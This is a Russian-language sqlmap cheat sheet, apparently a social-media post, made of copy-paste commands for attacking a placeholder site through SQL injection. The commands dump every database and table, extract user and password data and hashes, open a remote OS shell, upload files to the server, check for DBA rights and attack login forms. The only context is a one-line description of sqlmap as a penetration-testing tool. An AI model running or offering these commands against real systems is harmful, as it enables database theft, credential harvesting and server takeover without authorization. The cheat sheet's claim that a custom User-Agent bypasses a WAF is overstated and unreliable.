🔐 Шпаргалка по использованию sqlmapSQLMAP — это инструмент для проникновения с открытым исходным кодом.
SQLMAP позволяет автоматизировать процесс выявления и последующего использования уязвимостей SQL-инъекций и последующего получения контроля над серверами баз данных .
Кроме того,
SQLMAP поставляется с механизмом обнаружения, который включает расширенные функции для поддержки тестирования на проникновение.
🌟 Базовый скан URL на наличие уязвимостей:
sqlmap -u "http://example.com/page.php?id=1"
🌟 Автоматический дамп всех баз данных:
sqlmap -u "http://example.com/page.php?id=1" --dbs
🌟 Извлечение таблиц из конкретной базы данных:
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных --tables
🌟 Извлечение данных из конкретной таблицы:
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --dump
🌟 Обход WAF (брандмауэра) с помощью указания пользовательского заголовка User-Agent:
sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0"
🌟 Подбор базы данных и получение информации о пользователях:
sqlmap -u "http://example.com/page.php?id=1" --current-db --current-user
🌟 Включение интерактивной оболочки (OS Shell) для удаленного выполнения команд:
sqlmap -u "http://example.com/page.php?id=1" --os-shell
🌟 Выполнение SQL-запросов вручную:
sqlmap -u "http://example.com/page.php?id=1" --sql-query "SELECT user, password FROM users"
🌟 Проверка на возможность подключения с правами администратора:
sqlmap -u "http://example.com/page.php?id=1" --is-dba
🌟 Брутфорсирование паролей пользователей:
sqlmap -u "http://example.com/page.php?id=1" --passwords
🌟 Загрузка файла на удаленный сервер:
sqlmap -u "http://example.com/page.php?id=1" --file-write="/path/to/local/file" --file-dest="/path/to/remote/file"
🌟 Получение списка столбцов из таблицы:
sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --columns
🌟 Использование прокси-сервера:
sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
🌟 Определение используемой базы данных и версии:
sqlmap -u "http://example.com/page.php?id=1" --banner
🌟 Атака на POST-запросы (если параметры передаются в теле):
sqlmap -u "http://example.com/login.php" --data="username=admin&password=admin"